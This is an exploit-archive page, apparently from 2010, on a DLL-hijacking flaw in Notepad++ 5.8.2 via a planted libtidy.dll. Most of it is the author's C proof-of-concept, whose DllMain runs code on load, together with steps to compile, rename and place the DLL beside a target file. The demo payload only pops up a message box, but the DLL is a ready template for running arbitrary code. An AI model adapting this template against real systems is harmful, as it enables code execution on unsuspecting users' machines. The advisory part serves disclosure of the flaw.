Notepad++ 5.8.2 - 'libtidy.dll' DLL Loading Arbitrary Code Execution



EKU-ID: 39512 CVE: OSVDB-ID:
Author: anT!-Tr0J4n Published: 2010-10-12 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/44052/info

Notepad++ is prone to a vulnerability that lets attackers execute arbitrary code.

An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.

Notepad++ 5.8.2 is vulnerable; other versions may also be affected.

/*
#Notepad++ 5.8.2 DLL Hijacking Exploit (libtidy.dll)

#Author    :   anT!-Tr0J4n

#Greetz    :   Dev-PoinT.com ~ inj3ct0r.com  ~ All Dev-poinT members and my friends

#Email      :   D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com

#Software :  http://notepad-plus-plus.org/

#Tested on:   Windows? XP sp3

#Home     :   www.Dev-PoinT.com


==========================
How  TO use : Compile and rename to  libtidy.dll , create a file in the same dir with one of the following extensions.

 check the result > Hack3d

==========================

# libtidy.dll(code)
*/

#include "stdafx.h"

void init() {
MessageBox(NULL,"Your System 0wn3d BY anT!-Tr0J4n", "anT!-Tr0J4n",0x00000003);
}


BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
 )
{
    switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
 init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
break;
    }
    return TRUE;
}